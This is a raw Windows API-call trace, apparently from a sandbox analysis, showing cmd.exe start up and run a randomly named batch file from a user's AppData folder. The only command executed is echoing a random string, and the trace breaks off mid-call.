__set_app_type (_Type=0x1) [0117.465] __p__fmode () returned 0x76b331f4 [0117.465] __p__commode () returned 0x76b331fc [0117.465] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.465] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.466] GetCurrentThreadId () returned 0xe80 [0117.466] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe80) returned 0x38 [0117.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.466] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.466] SetThreadUILanguage 
(LangId=0x0) returned 0x409 [0117.466] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.466] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fe8c | out: phkResult=0x28fe8c*=0x0) returned 0x2 [0117.466] VirtualQuery (in: lpAddress=0x28fec3, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.466] GetConsoleOutputCP () returned 0x1b5 [0117.466] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.467] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.467] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0117.467] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.467] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.467] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.467] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.468] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.468] GetEnvironmentStringsW () returned 0x490150* [0117.468] FreeEnvironmentStringsW (penv=0x490150) returned 1 [0117.468] GetEnvironmentStringsW () returned 0x490150* [0117.468] FreeEnvironmentStringsW (penv=0x490150) returned 1 [0117.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28edfc | out: phkResult=0x28edfc*=0x40) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x0, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x0, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.468] RegQueryValueExW (in: 
hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegCloseKey (hKey=0x40) returned 0x0 [0117.469] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28edfc | out: phkResult=0x28edfc*=0x40) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x0, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, 
lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x9, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x9, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x9, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegCloseKey (hKey=0x40) returned 0x0 [0117.469] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635d [0117.469] srand (_Seed=0x5b88635d) [0117.469] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"" [0117.469] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"" [0117.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.470] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4919b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.470] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.470] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.470] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.470] GetEnvironmentVariableW (in: 
lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.470] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.470] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.470] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.470] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.470] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.470] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.470] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.470] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.470] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fbc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.470] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fbc8, lpFilePart=0x28fbc4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fbc4*="Desktop") returned 0x18 [0117.470] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.471] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f944 | out: lpFindFileData=0x28f944) returned 0x48ffe0 [0117.471] FindClose (in: hFindFile=0x48ffe0 | out: hFindFile=0x48ffe0) returned 1 [0117.471] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f944 | out: lpFindFileData=0x28f944) returned 0x48ffe0 [0117.471] FindClose (in: hFindFile=0x48ffe0 | out: hFindFile=0x48ffe0) returned 1 [0117.471] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f944 | out: lpFindFileData=0x28f944) returned 0x48ffe0 [0117.471] FindClose (in: hFindFile=0x48ffe0 | out: hFindFile=0x48ffe0) returned 1 [0117.471] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.471] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.471] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.471] GetEnvironmentStringsW () returned 0x490150* [0117.471] FreeEnvironmentStringsW (penv=0x490150) returned 1 [0117.471] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.473] GetConsoleOutputCP () returned 0x1b5 [0117.473] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.473] GetUserDefaultLCID () returned 0x409 [0117.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd08, cchData=128 | out: lpLCData="0") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fd08, cchData=128 | out: lpLCData="0") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fd08, cchData=128 | out: lpLCData="1") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.474] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.475] GetConsoleTitleW (in: lpConsoleTitle=0x4901e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.475] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0117.475] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0117.475] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0117.479] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", _String2=")") returned 58 [0117.479] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 3 [0117.479] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 3 [0117.479] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 6 [0117.479] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 6 [0117.479] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 15 [0117.479] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 15 [0117.480] 
GetConsoleTitleW (in: lpConsoleTitle=0x28fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.480] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f7bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f7b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f7b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0117.480] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0117.481] SetErrorMode (uMode=0x0) returned 0x0 [0117.481] SetErrorMode (uMode=0x1) returned 0x0 [0117.481] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x49dc08, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x28f520*="vMfCCeRYkvQy") returned 0x2d [0117.481] SetErrorMode (uMode=0x0) returned 0x1 [0117.481] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0117.481] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.486] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.486] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", fInfoLevelId=0x1, lpFindFileData=0x28f2bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f2bc) returned 0x4908f0 [0117.486] FindClose (in: hFindFile=0x4908f0 | out: hFindFile=0x4908f0) returned 1 [0117.486] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0117.486] GetConsoleTitleW (in: 
lpConsoleTitle=0x28f794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.518] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0117.520] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0117.521] IdentifyCodeAuthzLevelW () returned 0x1 [0117.527] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0117.527] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0117.527] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0117.527] CloseCodeAuthzLevel () returned 0x1 [0117.527] SetErrorMode (uMode=0x0) returned 0x0 [0117.527] SetErrorMode (uMode=0x1) returned 0x0 [0117.527] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", nBufferLength=0x104, lpBuffer=0x4904e8, lpFilePart=0x28f680 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", lpFilePart=0x28f680*="KGiXH98V.cmd") returned 0x3a [0117.527] SetErrorMode (uMode=0x0) returned 0x1 [0117.527] CmdBatNotification () returned 0x0 [0117.527] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0117.528] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0117.528] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.528] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.528] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.528] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) 
returned 0x0 [0117.528] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x23c, lpOverlapped=0x0) returned 1 [0117.528] SetFilePointer (in: hFile=0x58, lDistanceToMove=26, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.528] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\n") returned 26 [0117.529] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.529] GetFileType (hFile=0x58) returned 0x1 [0117.529] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.529] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.529] _wcsicmp (_String1="echo", _String2=")") returned 60 [0117.529] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0117.529] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0117.529] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0117.529] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0117.529] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0117.529] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0117.530] _tell (_FileHandle=3) returned 26 [0117.530] _close (_FileHandle=3) returned 0 [0117.530] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0117.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.531] GetFileType (hFile=0x7) returned 0x2 [0117.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0117.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.531] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0117.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.531] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.531] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0117.531] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0117.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.531] GetFileType (hFile=0x7) returned 0x2 [0117.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0117.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0117.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.532] GetFileType (hFile=0x7) returned 0x2 [0117.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0117.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x490958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x490958*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0117.533] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0117.533] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0117.533] GetFileType (hFile=0x7) returned 0x2 [0117.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0117.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0117.533] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0117.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.533] GetFileType (hFile=0x7) returned 0x2 [0117.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0117.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0117.534] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0117.534] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0117.534] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0117.534] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0117.534] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0117.534] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0117.534] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0117.534] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: 
